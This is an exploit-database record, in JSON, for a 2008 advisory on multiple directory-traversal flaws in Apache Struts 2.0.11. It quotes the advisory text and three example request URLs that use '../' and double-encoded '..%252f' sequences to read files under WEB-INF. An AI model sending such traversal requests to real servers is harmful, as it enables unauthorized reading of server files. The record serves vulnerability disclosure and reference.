Description
Struts 2.0.11 - Multiple Directory Traversal Vulnerabilities
{"lastseen": "2020-04-01T19:04:49", "references": [], "description": "\nStruts 2.0.11 - Multiple Directory Traversal Vulnerabilities", "edition": 1, "reporter": "Csaba Barta", "exploitpack": {"type": "remote", "platform": "multiple"}, "published": "2008-11-04T00:00:00", "title": "Struts 2.0.11 - Multiple Directory Traversal Vulnerabilities", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 1.0, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 1.0}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2008-11-04T00:00:00", "id": "EXPLOITPACK:EFB617587CEAC46DB92EC29B27A07DDD", "href": "", "viewCount": 3, "sourceData": "source: https://www.securityfocus.com/bid/32104/info\n\nStruts is prone to multiple directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied input.\n\nAn attacker can exploit these issues using directory-traversal strings ('../') to download arbitrary files with the privileges of the webserver process. Information obtained may aid in further attacks.\n\nVersions prior to Struts 2.0.12 are vulnerable. \n\nhttp://www.example.com:8080/struts2-blank-2.0.11.1/struts..\nhttp://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f\nhttp://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f..%252f..%252fWEB-INF/classess/example/Log\\in.class/", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645824872}}
{}
Struts 2.0.11 - Multiple Directory Traversal Vulnerabilities